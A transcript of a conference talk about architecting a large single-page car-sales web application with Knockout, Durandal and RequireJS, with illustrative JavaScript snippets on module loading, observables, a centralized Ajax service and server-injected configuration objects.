It's a little service that lets me work with local storage in a way that's useful for us, and then a little math library, those sorts of things. So down here is the real meat and potatoes, the views and the view models. Oh, and I skipped over tests; this single file has our tests. These are QUnit tests. I'll get into QUnit if we have time. I don't know if we will, but all of our tests currently just sit in this one file. So let's look at views and view models. Who here is familiar with MVC? Probably a lot of hands. Okay, so in MVC, especially in ASP.NET MVC, there's this idea of convention over configuration, and we're saying by convention I have this view called user.html and then we have this corresponding view model sitting over here, and those two get bound together because they have the same name. They sit in the same corresponding directory structure. That's the way Durandal works. It's the same thing. Durandal gives you conventions on top of knockout, which is pretty cool. That's both the benefit and the downside of knockout. The beauty of knockout is that it is just a library that solves a really particular problem, and as someone who spent a lot of time in Unix, I get it. The power of Unix is being able to pipe all these commands together: I'll cat this file and pipe it to sed, pipe that to awk, and then grep for such and such, and you get all this power by taking little tiny pieces, little tiny applications, and using them together. That's what knockout allowed us to do, because knockout solved the problem of binding, and it does that really well. The thing that it doesn't do, though, is tell you where to structure your files and how to do so. That's what Durandal does for us. Let's jump into the heart of the application. I'm going to collapse this down. This is default.aspx. This is what loads initially. The first thing that's interesting about this is that this file is only 46 lines long. There's not much here to consume.
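That view/view-model pairing convention boils down to a path mapping. Durandal's real view locator is a configurable component; the folder scheme below is just an illustration of the default idea, and the module ids are made up:

```javascript
// The gist of convention over configuration: derive the view's path from
// the view model's module id, rather than registering every pair by hand.
// (Durandal's actual viewLocator is configurable; this shows the idea.)
function viewForViewModel(moduleId) {
  // 'viewmodels/windows/editVehicle' -> 'views/windows/editVehicle.html'
  return moduleId.replace(/^viewmodels\//, 'views/') + '.html';
}

console.log(viewForViewModel('viewmodels/desk'));
// 'views/desk.html'
console.log(viewForViewModel('viewmodels/windows/editVehicle'));
// 'views/windows/editVehicle.html'
```

One function replaces dozens of explicit registrations, which is exactly why parallel views/ and viewmodels/ folders with matching names pay off.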
I have, at the top, we'll just run through it, some references to CSS; not much to see here. Then we come down to the body and there's this. This piece is of interest. This is the wrapper that gets changed. You know how when I first loaded it, it said loading, and you waited for it to load and then it went away? This is what Durandal replaces after it's pulled down all of your content. It ends up slapping all your content into the loading wrapper. It basically looks for an element with an ID of loading wrapper that's sitting within the application host, which sits right up above. If you do Angular, Angular has a similar idea, but you would say ng-app to be able to reference the app, and then things within that get handled by Angular. Then we jump down to the bottom and you'll see all the scripts. You can see there's quite a few. Just probably nothing too surprising here. We have a tracker. We're using Track.js, which, by the way, if you're wanting to track JavaScript errors, Track.js is a great service. A friend of mine, Todd, runs it. He's speaking here too. He's already spoken, though, so you missed it; hopefully you got to see him. Then ultimately down here at the bottom we have what? Knockout, Q, and some simple libraries for handling dates and whatnot. The interesting thing is you're going, wait, that can't be all the JavaScript, because I said there were 90-something files of JavaScript that ultimately get used here, and that's true. The real story is what's going on here on line 44. We're using RequireJS, and a lot of people weren't familiar with it, so let me go into that. The story with RequireJS is you can download your JavaScript files on demand, and you follow what's called the asynchronous module definition pattern, which basically lets you say at the top of your file the other dependencies that your file has. A lot like a using statement.
In C-sharp you'll say using this, using this, that's you saying, hey, go get these other resources and pull those in for me. Let's look at one example of a view model. Let me try to pick, okay, this one's massive. Let me pick one that's a little easier to digest. Okay, yeah, this one's pretty easy. This is the view model that is used for handling templates. If I jump over here to the UI so you know what templates are, it's over here in this accordion under Manage Templates. You can open up different templates and manage them. These are just quick ways to get started on a desk and people can set up a desk in different ways. This little area right here has its own view model. Ultimately, this has a view model, this has a view model, this has a view model, this has a view model. The big app and all the complexity, every single dialog box has its own view model. We've eaten the elephant a bite at a time. Back to RequireJS. This is an asynchronous module definition pattern. What RequireJS is saying is right here, I'm saying, okay, here are three. Three dependencies. These are three other files that this file needs to load. What RequireJS would do is when I made a call to this file, it would say, okay, go get these other dependencies and bring them into scope. I define what variables are used for these over here on the right. You'll notice, and if I formatted this better, you could read it better. This corresponds to this, the second, to the second, and the third to the third. I'm saying this is the variable name that you will use down below to reference those. The cool thing about RequireJS is on page load, I'm not having to pull in those 95 files. I pull in the JavaScript files that are necessary, and then as they're needed, RequireJS goes out and it makes the calls to get the others. That keeps your initial HTTP call as lightweight as possible. Let's go back to default. 
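The AMD shape that RequireJS implements can be sketched in miniature. Real RequireJS fetches each missing dependency over HTTP asynchronously; in this toy, synchronous version the modules are just registered up front so only the shape of define() is on display, and the module names are invented:

```javascript
// A miniature, synchronous sketch of the AMD pattern RequireJS implements.
const registry = {};

function define(name, deps, factory) {
  // Resolve each dependency name to the module it produced, in order,
  // and hand them to the factory as arguments: the dependency array on
  // the left lines up position-for-position with the parameters on the right.
  registry[name] = factory.apply(null, deps.map(d => registry[d]));
}

// Module names here are made up for the example.
define('services/math', [], () => ({ add: (a, b) => a + b }));

define('viewmodels/desk', ['services/math'], math => ({
  total: math.add(9900, 1000),
}));

console.log(registry['viewmodels/desk'].total); // 10900
```

That positional lining-up of dependency strings to factory parameters is exactly the part of the real define() calls in desk.js that is easy to misread when the list gets long.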
The way that all works is by convention: it takes an HTML5 data attribute, data-main, and that forces it to come out here and look for a JavaScript file called main. In here, that's where I configure RequireJS. This is some stuff specific to Durandal, so I won't bore you with those details. The largest view model in this application is desk.js, probably not surprising. This is where the core of the logic sits. If you look at the number of dependencies on this one, it's high enough to be a little bit embarrassing for me. These are, as you can see, there are a lot of dialogue boxes in this application. We put all of those under slash windows. Then, of course, these are all the variable names that associate those things up above. The one thing I am proud of is this file is huge, but if I scroll down through it, what you see is there's a lot of, let me just do this. I'll collapse it all down. If I collapse down to just function names, you at least see that these are a lot of small, well-named methods, because watch the line numbers on the left. This is something I do a lot when I open any kind of file. I like to collapse it down to definitions and then scroll through and just get a feel of the high level of what it does, because you can read the function names and you can look at line numbers and go, I shouldn't see any huge jumps in line numbers. If I see a jump from line 1,000 to line 2,000, that's a bad sign, because that means there's a thousand-line method sitting there, and there's a lot going on that I need to go understand, and there's no good function name that's going to declare all that's going on inside. All right, so how big is this? These are the stats. It's a very heavy load. 93 JavaScript files, 19 separate HTML files, five CSS files and 11 images, because we're using sprites, a spritesheet that really greatly reduces the number of images that we have to require for this. So that's 132 HTTP requests. That's pretty absurd. Is this malpractice?
Is that too many? I feel like that's just silly. So for those that think it's silly, what is your recommendation to me to reduce this number? Bundling and minification, yes, and that's the very common answer. Now I am not bundling or minifying in this case, and can anyone think of a reason why I shouldn't bother? Yes? Did you call me lazy? Because I'm lazy loading? That sounds much better. Thank you. We're going to go with the second hand. Yes, because I'm lazy loading, and that is part of it. With RequireJS, if I bundle everything, RequireJS can't do its thing anymore and request them on demand. So that's one reason. Now the bigger reason is this. Remember, this whole app sits behind a login. The situation is a salesman comes in in the morning, grabs their coffee, and they load this application, and this will be the only application that they use all day. So whether this takes one second or three seconds, and by the way that's about the difference between these two in our case, doesn't matter, because it's a couple seconds once a day. It's really small beans. So there are some other things that are really a downside to bundling and minification. Once you go to production, then all of a sudden your code in production doesn't mirror what you have on your local machine. There are ways to get around that, but it does add complexity. And I am all for keeping it simple if I can. And in our case, we can keep it simple and live with the fact that it doesn't exactly load like blue blazes. That said, let's just see how fast it loads. 132 HTTP requests on conference Wi-Fi, hitting servers and, oh, we're done. So I wasn't done doing the description. We're hitting servers in the United States from the other side of the world. I can tell you this: when I demo it in the States, it is quite a bit faster. Also, I think the Wi-Fi just seems a little slow today. So let's do it: one, two, three, four, five. Yeah, that's pretty painful. If this were a public app,
I'd give it an F. But given our user base, this works okay. Now if I cleared cache and did this again, you'd see that number go way up. Because if I open up Fiddler, of course, and look at what's going on here and see all the requests come down, let's do that. So here it is spitting through them all. One by one. Got them all in. And, well, no. It's still working on it. In fact, it looks like we're getting... Oh, no, I guess it did all come down. Okay. Just a lot of things didn't have to get loaded because it was all cached. Okay. So let's jump back over here. The full single-page application, 53 view models, nine libraries, 39 pop-up windows, 56 HTML files, and 94 RESTful endpoints. There are a lot of service calls. And also, I should get into the REST side of things here. And let's see. I'll do that a little bit later. I want to save that some. One of the reasons that we had to choose a knockout with the Randall was because the great thing about knockout is you can use it all the way back to IE6. And for now, I haven't heard any changes on that front. I think that's staying for the foreseeable future at the moment. There's this real trend right now toward evergreen browsers. And this idea that we're only going to support browsers that auto-update. Now, the definition of auto-updating is a bit interesting, though, because IE10 auto-updates. But as far as I know, IE10 will not auto-update to 11. Is that true? Can anybody confirm that? I have not heard any confirmation that IE10 will ever move to 11. So IE10 is not an evergreen browser. And I don't know of any plans for IE11 to auto-rev to 12. Maybe that will be the first one that's truly evergreen. But that's what we need is this idea of people that are on the browser today will get the new version as soon as possible. That helps us really move this story of single-page applications forward. And that's important because IE8 is 10 times slower than modern browsers. And you can feel this. 
Does anybody want to see how this runs in IE8? Okay, I figured some people would be curious. This is a good time for me to show you BrowserStack. We're using BrowserStack to do cross-browser testing. Beauty of BrowserStack is you pay them a little bit of money, and then all of a sudden you have huge convenience. Let me show you what you get here. These are all the operating systems that I can test in. And even some mobile emulators. This for Windows XP, just Windows XP. Look at all the browsers I have to choose from. I can go all the way back to IE6. And then, of course, I get to select my resolution. Now I tend to spend most of my time testing in IE8 on Windows XP because sadly, 14% of our customers are still on IE8. 14% of them are still on 7, but I was at least able to sell management. The 14% on 7 cannot use this new app. I just did not want to go down that road of trying to support 7, too. There's a lot more pain going back to IE7. So this is firing up a virtual machine. And oh, I just remembered, I can't do that this way. Wait, wait, where did I go to? I think I pointed to the wrong... Give me just one second. I'm going to load back up. I think what I did was I pointed to... Yes, I did. I'm going to the wrong URL. That makes all the difference I found. It's getting the right URL for demos. There's a pro tip next time you speak. All right, so we're going to hit the proper prod URL here. And it does rely on Flash. It's a little bit slow because remember, it's spinning up a virtual machine just for you. And now... And so here's the mind bender is I'm hitting some machine somewhere in the world and the browser is showing all this to me basically using Flash. And it is very slow, especially on slow Wi-Fi like this. It's pretty painful to use. You really want a fast network to be able to use BrowserStack. And it feels especially slow when you're trying to demo for people. But you can automate tests with BrowserStack. 
So you want to write a bunch of tests and then integrate and make sure that your app runs properly in older browsers. Then you can write automated tests and just ship them all off and they'll run. And you don't have to worry about exactly how long they take, because it's all just automated and you're not standing around waiting. All right, so you're going to have to bear with me on the fact that... Let me try full screening here to get us a little more space. And it is loading right now. It's going to be... There we go. Okay, so we are in. By the way, there's a bug in their virtual machine. I should have pulled up the IE7 version instead, but this is a display issue that only happens in their virtual machine. It doesn't happen on a real native install. And boy, does this look as awful to you as it does to me? Yeah. And that's the thing: they will throttle down display quality as much as they have to based on your connection to get you something viewable. They can see that the Wi-Fi here is painfully slow. So let's do this. How long does it take to load a desk within this app? I will click this and one, two... So you can see... I'm going to tell you when I click. Click. Now in Chrome, it was instant. One, two... It was about two and a half seconds. Let's go over to Chrome and see how fast this is. One... One... Yes. One... I mean, so you can see Chrome is more or less instant, even on a slow connection, as I load these. But over here on this VM, it's pretty painful. One, two... And granted, this is the combination of a slow VM and also running IE8, which has a much slower JavaScript engine. Let's do something that ends up exercising the engine a bit more. This changes a whole bunch of DOM elements. So I'm going to say I want to roll to 225 and I'll end up setting the price here. So this is going to change all sorts of elements behind the scenes. And we'll go one, two... About two, two and a quarter seconds.
So if you were using this all day, you'd probably go, oh, this is a little painful. So I'm hoping that the people that use it on IE8 complain about the speed and then I can say, well, hey, you have a free solution: just go upgrade your browser, or go download Chrome for free. Even if you have to have IE8, you could always have Chrome alongside it. There's nothing we can do about the fact that it is 10 times slower. So things that are instant in Chrome show up here. And this is, by the way, after doing a lot of work to improve the performance. But there are just a lot of bindings going on here. How many people know what computed observables are? Knockout has those; they help you basically run computations on certain fields, so you can imagine that some of these are derived from calculations on other fields. And that is one interesting question. So you guys are seeing all this math happening, right? Where do you think I'm doing the math, client or server? How many people think client? How many think server? A lot more hands than I assumed. Okay, so the room thinks I'm doing it on the server, and the room's right. At first I wanted to do it on the client, because the client would avoid making an Ajax call to go calculate all this stuff. There are some problems with that, because the math here is not trivial, not trivial at all. There's a lot of business logic involved. There are taxes for every single state in America, and that all differs even based on localities, different cities. So we need to make calls to the server to run all of that calculation. There's also some pretty complicated algebra and advanced math to be able to pull off things like rolling a deal and figuring out how changing one number impacts all these other numbers. There's a ripple effect that happens there. So the server made sense there. We make a call to the server, it calculates it, it sends it back. I want to show you how big this data model is.
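Since computed observables come up here, a minimal sketch of the mechanism they rely on, in plain JavaScript. This is a toy illustration of the idea, not Knockout's actual implementation; all of the names (observable, computed, the deal fields and numbers) are made up for the example.

```javascript
// Toy observable: call with no arguments to read, with one argument to write.
function observable(initial) {
  let value = initial;
  const subscribers = [];
  function obs(newValue) {
    if (arguments.length === 0) return value; // read
    value = newValue;                         // write...
    subscribers.forEach(fn => fn(value));     // ...and notify dependents
  }
  obs.subscribe = fn => subscribers.push(fn);
  return obs;
}

// Toy computed: re-evaluates whenever any listed dependency changes.
function computed(evaluate, dependencies) {
  const result = observable(evaluate());
  dependencies.forEach(dep => dep.subscribe(() => result(evaluate())));
  return result;
}

// Example: a payment figure derived from two other fields.
const price = observable(24000);
const termMonths = observable(48);
const monthlyPayment = computed(() => price() / termMonths(), [price, termMonths]);

price(30000); // monthlyPayment recalculates automatically: 30000 / 48 = 625
```

With bindings on top of this, changing one value ripples into every DOM element bound to a derived field, which is exactly the effect described in the demo. The real Knockout ko.computed also does automatic dependency detection, so you don't list dependencies by hand.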
I'll say a recent deal, so I'm going to go over here to Fiddler and remove everything. Now I'm going to just load this one deal for Robert Taylor. We just loaded it. Let's go see what Robert Taylor's deal looks like. Here it is. Here's our service call. I'm going to pull it over and we'll look at the JSON that came back. I'll go over here to JSON. So one thing for starters: the size of the JSON was a little over 4k. I just went to Douglas Crockford's talk, and he said when he designed JSON, he was imagining people would send 2 or 3k with it, and he's had bugs opened by people trying to process gigabytes worth of JSON. And he had an integer overflow from somebody trying to do so, which is really interesting. Edge cases, right? People keep pushing this stuff. So what I want to do is just scroll down to give you an idea of how complex the data model is, because I don't have time to take you through the whole app. But I'm going to scroll slowly so that you can see all the properties that are getting sent down to make this application happen. There are accessories, there are add-ons for the cars, there are service payments, there are different flex payments, monthly taxes, gap. I'm trying to scroll slow, but there's a lot there. Hundreds and hundreds and hundreds of properties. Old-school jQuery: imagine if I was going in and I said, all right, let me go through this. The first property I will tie to this DOM element, the second property to that DOM element. Does that work? With that much JSON, could I do it? And would I go insane before I got to the end of it? It just doesn't work, right? And that's the beauty of using Knockout combined with the mapping plugin. Because what the mapping plugin does is... so, people said they were familiar with Knockout. In Knockout, you need to declare something observable so that Knockout will keep track of that value, and you will get a two-way binding.
I don't want to take all of these properties and have to go one by one, set a variable within JavaScript and set it observable to this property, because I would be repeating myself, right? And with the mapping plugin, I don't have to repeat myself. Let me show you how this works. So for instance, here we go. I take all the deals and I bind them using ko.mapping.fromJS. And that's saying: go take all this JSON that you just received and make everything in it observable. And now anything within that view model is observable by Knockout. Anything that changes in the JavaScript will change the corresponding HTML DOM element, and anytime the DOM element changes, the corresponding JavaScript value will change. And this is a good segue for that. I'll bounce back for a second, because I wanted to show you this quickly; I forgot to wrap up the performance story. So this is how it breaks down on performance. You can see that with an empty cache, back in the States I was getting about a 13-second initial load time on IE8. That's painful. That's pretty hard to justify. But they only have to pay it once, the first time they load it. Then it's all cached up. And you can see that with a warm cache, three seconds really isn't too bad. So this is where you just have to decide whether minifying the JavaScript and combining the files would be worth it. This is the tech stack that we've been looking at. And when you look at all these boxes, it's pretty intimidating. Now the server side is pretty simple: we're using Web API, Mlight for the data access layer, and then MSTest for automated unit testing. But how many people feel like that client-side story, these nine boxes on the right, is too much? That it's too complicated? That's a common feeling. And my concern is this: if I am an employer out there looking for a developer, it's really hard to find somebody that knows all of this. And it's hard to convey it.
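To make the mapping-plugin idea from a moment ago concrete, here is a toy sketch of what a helper like ko.mapping.fromJS automates: recursively wrapping every leaf of a plain JSON payload in an observable. The real plugin does far more (array tracking, updates, unmapping); the observable here is a stand-in, and the deal properties are invented for the example.

```javascript
// Stand-in observable: read with no arguments, write with one.
function observable(initial) {
  let value = initial;
  return function (v) {
    if (arguments.length === 0) return value;
    value = v;
  };
}

// Recursively wrap every leaf value of a plain JSON object in an
// observable, so hundreds of properties never get declared by hand.
function mapFromJS(data) {
  if (Array.isArray(data)) return data.map(item => mapFromJS(item));
  if (data !== null && typeof data === 'object') {
    const viewModel = {};
    for (const key of Object.keys(data)) viewModel[key] = mapFromJS(data[key]);
    return viewModel;
  }
  return observable(data); // leaf: becomes readable/writable
}

// A bindable view model generated straight from the payload:
const deal = mapFromJS({ customer: 'Robert Taylor', payments: { monthly: 450 } });
deal.payments.monthly(475); // write through the generated observable
```

The payoff is exactly what the talk describes: a 4k payload with hundreds of properties becomes a fully observable view model in one call, with no hand-written declarations to repeat.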
If I tell people that I could look for somebody that knows Knockout, fine, but the chance of finding somebody that knows Knockout and Durandal gets lower. And then somebody that knows Knockout and Durandal and understands RequireJS and understands these other conventions that we're using, it starts to become a much smaller and smaller pool. And this is part of the reason that I think Angular is becoming a lot more popular, because Angular tells a story that is far, far simpler. We'll get to that in a minute. Now, I say it's simpler, but it's simpler because it is extremely opinionated. And if you don't like it, tough luck, right? It is a very, very different view of the world. We use Knockout and Durandal because 14% of our customers are on IE8. And here are the three big reasons that Durandal is really useful. It is convention-based. So just like ASP.NET MVC, it defines where your models and your views go. You can set up routing. This all feels really familiar if you've ever worked in that space. It allows you to compose things together. And this is really cool. So see how I'm saying div, data-bind: compose? This goes out and gets the view model called vehicle, and then it just splats it right into the page, right within this div. So whatever is within that view model: it goes and gets the view and the corresponding view model, glues them together, and then puts them there on the page. Really easy to understand. So if you're familiar with ASP.NET Web Forms, for instance, then you could think of this like a reference to a user control. It's just a user control sitting right here, a little reusable piece that you can plug in. And I already mentioned routing. But Durandal and I have had a bit of a torrid love affair of late. This was hard for me, because remember, I said we were replacing Silverlight with this new HTML5 JavaScript CSS app, right? And I made the call and said we should use Knockout with Durandal.
And we launched just a couple months ago, and then the bomb drops. Here we go. In case you haven't heard: how many people already heard that Durandal is basically dead? Rob isn't using those words, but more or less, Rob, who started the Durandal project, has moved over to join the Angular team. He did a Kickstarter, and the Kickstarter just didn't quite play out for Durandal. So I think he decided it made the most sense: if you can't beat 'em, join 'em. And he has some really cool ideas that I'm hoping come over into Angular. Because as somebody that's worked in both Durandal and Angular, there are some things that Durandal does that I really like that aren't yet in Angular, and I think we'll start to see some of those. This is an interesting read, though. Nonetheless, so there's the tombstone, sad moment. And this is the way I felt when I read it. It was a punch in the face, having to tell my boss that we might as well be on Silverlight, on dead tech again. Now that said, this is very, very different, because someone may pick up Durandal and keep rolling with it. And even if they don't, moving from Durandal over to Angular isn't nearly as painful as moving from Silverlight to where we are now. Almost everything that we have can be reused. Most of the HTML won't have to change drastically. We'll start typing "ng" a whole lot more if we move to Angular sometime here soon, which is likely going to happen. So again, this is our stack, and a whole lot of boxes here. And this is why I believe Angular is getting a lot of attention: it is easier to grok this than this. And ultimately, you're going to need a lot of these other things up here if you want to build a full application. And you could argue that this is Unix and this is Windows. People like Windows because it's opinionated; it just says, hey, do all these things.
Whereas Unix is cool because it's a whole lot of small things, and I'll pick the best of breed of everything. If you want the best of breed, you can still play in this space. Now Durandal's MIA, but the fact is everything that Durandal does, you could go ahead and do yourself. Durandal's just a set of conventions for working with Knockout, and Knockout isn't going anywhere. So you just have to make those decisions on your own instead. I've already talked about RequireJS, so I don't think I'll do a deep dive on any of that. We do have automated tests, but I don't know that I'll have time to get into them either. Ultimately, the way we're doing testing is really automated integration testing. And the cool thing about having the separation of concerns is that I can test the view models, and I can trust that when the view model is in a certain state, the right things are happening. I'm not testing whether a certain DOM element exists by doing something like you might do with Selenium, for instance. I'm not testing the UI. I don't have to fire up IE or use PhantomJS or anything like that. I'm just testing logic by testing the view model and saying: if the data is in this state, then the right things have happened. So it's not as fast as unit tests and it's a little more brittle than that, but it is pretty quick to get set up. And what this does is you just fire it up in your browser, or you can use... has anybody used Chutzpah? A few hands. Okay. You can use Chutzpah (and I'm sorry, I'm speaking about Visual Studio; anybody that works in Visual Studio could use Chutzpah) to integrate QUnit with Visual Studio, and then your tests will run in the test runner and they'll feel totally native even though it's JavaScript. I'm not going to read you this slide, but if you download the slides, this is just a reference for everybody. So I want to close with some principles. These are some lessons learned from the last year of this work.
First question: how do I keep the DOM and the JavaScript in sync? Who can answer that? Binding. There we go. Yes. So what are the two-way bindings, and what is giving us the two-way bindings? Knockout. Knockout is doing that. There are other ways to do that. Angular does it in a similar way. Backbone has its own ways of solving this. But ultimately, this idea of having the two bound together is really powerful. In Knockout, you have to define it as an observable to get this goodness. That's one other benefit of Angular: you can use POJOs, plain old JavaScript objects. You don't have to declare anything observable. Angular is just out there constantly looking for any changes in your JavaScript and saying, oh, that changed, then let me go find the corresponding DOM elements. That sounds really inefficient, but it works pretty well. Unless you write something ridiculously complicated, there have been very few people complaining about performance with Angular using this. How do I update many DOM elements when one changes? Computeds can do that. Again, you could just say bindings; that's what the bindings are doing. If I have three different DOM elements bound to the same value, then what's going to happen is when that value changes, all three of those DOM elements are going to change at the same time. Yes, computed observables; that was the other one that people were saying. So far, you're getting an A. Good deal. How should I move data between the client and the server? This is where there are a couple things going on. You need to be able to take all your JSON and turn it into a string. You can use JSON.stringify to do that. That works in all modern browsers, and you can shim it in with JSON2.js, which I believe Douglas Crockford wrote. Thank you, Douglas, again. That's really useful, so that you can get that data back to the server without having to explicitly convert it over to JSON. We centralized our service layer.
I want to show you quickly how that works. One thing that I didn't mention is we're referencing jQuery in our app, but the amount of jQuery that is written in this app is hilariously small, to the point that really the only reason it's in here is because I use Kendo UI for some of the UI, and Kendo has a dependency on jQuery. The only real jQuery that's in our app is this little function right here. You probably recognize the jQuery $.ajax call. What I've done here is wrapped it all in a promise, because we didn't want to use jQuery's promises; again, jQuery promises don't follow the Promises spec. We're using Q instead, and we're coming in here and making all of our requests through this one line. So this is the library that makes the call, but by having every single Ajax call run through this one method right here, I have a lot of power, because I can do things like this: I have a preloader that shows up. Remember how you were seeing it from time to time whenever I was changing things? That preloader would show up. This is the place to do it, because this is where I know that it's happening. You could say this is a bit ugly, because it means that this service library knows a little bit about the UI. I don't have a real good solution for this offhand. You could use something like postal.js, I believe, where you could subscribe to these events that are happening, but I haven't gone down that road. Anybody use postal? I never see many hands on that. Congratulations, Gil. You're the only one. What's that? I haven't heard of postbox. Okay. Postbox is apparently similar. Nonetheless, what you see up here is, if I look at any one of these files that are making the Ajax calls, for instance, the Ajax calls for the deal, here we go: what you find are one-liners, because all I really need to define is the endpoint and pass the data in. Then I delegate everything to that Ajax service that I've set up.
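Here is a rough sketch of that shape: one function every request funnels through, returning a promise, with the preloader handled in that single place so the endpoint modules collapse to one-liners. This uses native promises and a fake transport instead of $.ajax and Q, and every name here is illustrative, not the app's real code.

```javascript
// Centralized service layer: all cross-cutting concerns (the preloader,
// eventually error handling) live in exactly one function.
function makeAjaxService(transport, preloader) {
  return function ajax(method, uri, data) {
    preloader.show();
    return transport(method, uri, data)
      .finally(() => preloader.hide()); // hide on success AND failure
  };
}

// Endpoint modules then become one-liners that only name the URI:
function makeDealService(ajax) {
  return {
    getDeal: id => ajax('GET', '/api/deals/' + id),
    saveDeal: deal => ajax('PUT', '/api/deals/' + deal.id, deal),
  };
}

// A fake transport so the sketch runs without a server.
const fakeTransport = (method, uri) =>
  Promise.resolve({ uri: uri, customer: 'Robert Taylor' });
const preloader = {
  visible: false,
  show() { this.visible = true; },
  hide() { this.visible = false; },
};
const deals = makeDealService(makeAjaxService(fakeTransport, preloader));
```

The coupling concern from the talk is visible here too: the service layer knows about the preloader. Passing the preloader in as a dependency (or publishing events, as with postal.js) keeps that knowledge at least injectable rather than hard-coded.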
By the way, all that I'm showing you here, this is, again, something that isn't provided by Knockout. It's not provided by Durandal. This is my own creation here. If I were using Angular, Angular has its own opinions on how to do this. You can use its $resource service, for instance, to just go in and say: all right, by convention, I created a RESTful API, and if I followed the general pragmatic REST principles, then my URIs are going to be set up in a way where Angular makes it super easy to be able to do all of this. I spent a lot of time designing this, and I'm really happy with how it worked out, because, as you can see, every time we stand up a new Ajax call, all I have to do is define a get or a put, put in the URI and pass in the data, and it just works. The promises happen, the UI does what it should, and I get the data back serialized like I'd like it to be. That's pretty handy. Put the business logic on the server rather than the client. This is one of the other reasons that we aren't doing all our math on the client: even if I minify and obfuscate it, somebody could go back and put all those little shredded pieces of paper back together, and effectively they have our application. Or maybe they don't even want to understand it; they can just copy and paste the whole thing and go host it elsewhere, and now they have a working solution, because all they really need is a server on one side to provide some data. So we put everything we can over on the server in our spa, and making Ajax calls is not particularly expensive, so err on that side. Another thing to consider: how do I inject data from the server into my JavaScript on page load? And what I'm highlighting there is what I call the JavaScript configuration object pattern. I don't have a slide on it, but let me pull it up. It'd help if I could type it. There I am. I've got a blog post on this that really sums it up.
And the idea of the configuration object pattern is to take any data that the server knows is needed on the client and send that data down on page load. If you know the client is going to need it, get it down there fast. So let's go down here, and here's the example. Imagine that I have a single code base that's used by a bunch of different customers, and I have Google Analytics in there. I need to inject a different key for every single one of those customers. So I have all this static JavaScript sitting right here, and then the only thing that changes is this one line right here, the Google Analytics key. Now the way that some people would want to solve this is to go onto the server, write all your JavaScript in one big string, and then inject that variable from the database, right? How many people have done that? That's a pretty common pattern, and it's problematic for a number of reasons. Now let me get to the solution first, because we're pretty tight on time. Ultimately, if you go in here instead and write all your JavaScript as just plain old JavaScript, put it in a JS file, then you can inject JSON into your page by using a JavaScript serializer in your language of choice. In C#, I use the JavaScriptSerializer; there's also JSON.NET, whatever you want to use. Ultimately you want to take an object on your server, serialize it to JSON, and spit it into the head of your page. And this is a pattern that's used all over the web. For instance, if I go to Google right now, you'll find... boy, they have a lot going on. I think an easier example is if I go to Stack Overflow and look at their source, and what you'll find is they do the same thing. If I go in here, you'll see the StackExchange object. So they're using what I call the JavaScript configuration object pattern to set all these things that are specific to me: the locale, the auth URL, all of that is used by their JavaScript to make the application work.
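A sketch of the pattern's two halves. The key names and the appConfig variable are invented for illustration; the point is that the server serializes exactly one object to JSON, and all of the static, cacheable JavaScript simply reads it instead of being generated as one big server-side string.

```javascript
// 1. The server serializes ONE object to JSON (JavaScriptSerializer,
//    JSON.NET, whatever) and emits it in the page head, e.g.:
//    <script>window.appConfig = {"analyticsKey":"UA-12345-6", ...};</script>
const serverEmittedJson =
  '{"analyticsKey":"UA-12345-6","locale":"en-us","apiRoot":"/api"}';

// 2. All the static JavaScript lives in plain, cached .js files and just
//    reads the injected object (simulated here with JSON.parse; in the
//    browser this would simply be window.appConfig).
const appConfig = JSON.parse(serverEmittedJson);

function analyticsSnippet(config) {
  // Only this one value varies per customer; everything else is static JS.
  return 'ga("create", "' + config.analyticsKey + '")';
}
```

Because the per-customer data is confined to one serialized object, the rest of the JavaScript gets code coloring, syntax checking, caching, and none of the escape-character headaches of building scripts as server-side strings.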
So have your server send down the knowledge that it knows right up front. And these are all the benefits of it: you separate your concerns, you get caching, you're minimizing your string-parsing overhead. It is really painful trying to read JavaScript that isn't code-colored and syntax-checked when you make those typos. If you write it on the server in a big string, then you're forcing somebody to think in terms of: okay, well, let's see, you're writing in Java or you're writing in C#, but this is a string that's ultimately going to be JavaScript. So you're dealing with escape characters, you get no code coloring, and it becomes really hard to maintain and understand. So how do we organize all this JavaScript and HTML? Well, compose small views and models. And that's what we saw; that's why we broke it down to almost 100 different files. Other than that one really large view model, most of our view models are 50-ish lines of code and most of our views are 50 to 100 lines of HTML. They're solving small problems well. And the beauty of that is when I come over here and look at the app and say, okay, there's a bug right here under recent deals, then I know what I need to do is come back over here and open recent deals, or rather recent desks.html (the fact that it's named wrong is a separate political argument that I lost, but we won't get into that). And you notice how small this is, because this view is just handling that little tiny section right there that was listing the recent deals. So it gets really easy to quickly come in and go, okay, well, there's something wrong with the JavaScript; I know that's going to be in recent desks.js, because that's the corresponding view model for this view. So here's the little bit of view model. And as you can see, it's a really small view model, because there's not much logic here.
You can load a desk, you can toggle whether it's showing, and you can determine whether the heading's visible. So it's pretty simple stuff going on there. Durandal lets you compose views within other views. This is one of the really cool, powerful pieces of Durandal, and it's something that it does, I feel, better than Angular right now. But Angular has some interesting things that only it does right now too. Angular's directives are really cool. Is anybody familiar with web components? Next year a lot more people will be raising their hands. That's the direction that things are going. Web components are something that Angular's basically shimming in right now with its idea of directives. So it's a really powerful way to be able to remove the cruft in your code and think at a higher level of abstraction. So instead of having div, div, div, div, and then ul and all this, I can define that top-level item with a tag name. For instance, if all those divs ultimately came together to be a voting button, then I could put the tag in as voting-button, and all that stuff inside would just get thrown in. So, pretty powerful idea. How do I avoid repeating myself? Have your server send everything down and then just use what your server did, because your server can handle all this stuff. Don't go defining empty objects for your spa on the client. Have your server send down what's called a null object, an empty object, and then you can use that empty object throughout your application if you, for instance, need to add another row, that sort of thing. I won't have time to really get into this movement, but it's a really interesting conversation about the style of JavaScript development over time. Ultimately, we are in a new era, though, and this era is data binding. This old idea of unobtrusive JavaScript: it ended up there were some real problems with it. If I was using unobtrusive JavaScript, I could not have built this application.
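To pin down that null-object idea from above, a small sketch. The property names are made up for the example; the point is that the empty template comes down from the server with the payload, and the client only ever clones it, so the row's shape is never re-declared in JavaScript.

```javascript
// The server includes one empty template (the "null object") right in
// the payload, next to the real data.
const payloadFromServer = {
  accessories: [{ name: 'Floor mats', price: 120 }],
  emptyAccessory: { name: '', price: 0 }, // the null object
};

function addAccessory(payload) {
  // Deep-clone via a JSON round-trip so new rows never share state with
  // the template (fine here, since the data is plain JSON anyway).
  const row = JSON.parse(JSON.stringify(payload.emptyAccessory));
  payload.accessories.push(row);
  return row;
}

const newRow = addAccessory(payloadFromServer);
newRow.price = 350; // the server-defined template itself stays pristine
```

If the server later adds a property to accessories, the client's "add a row" path picks it up automatically, with no duplicated object literal to keep in sync.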
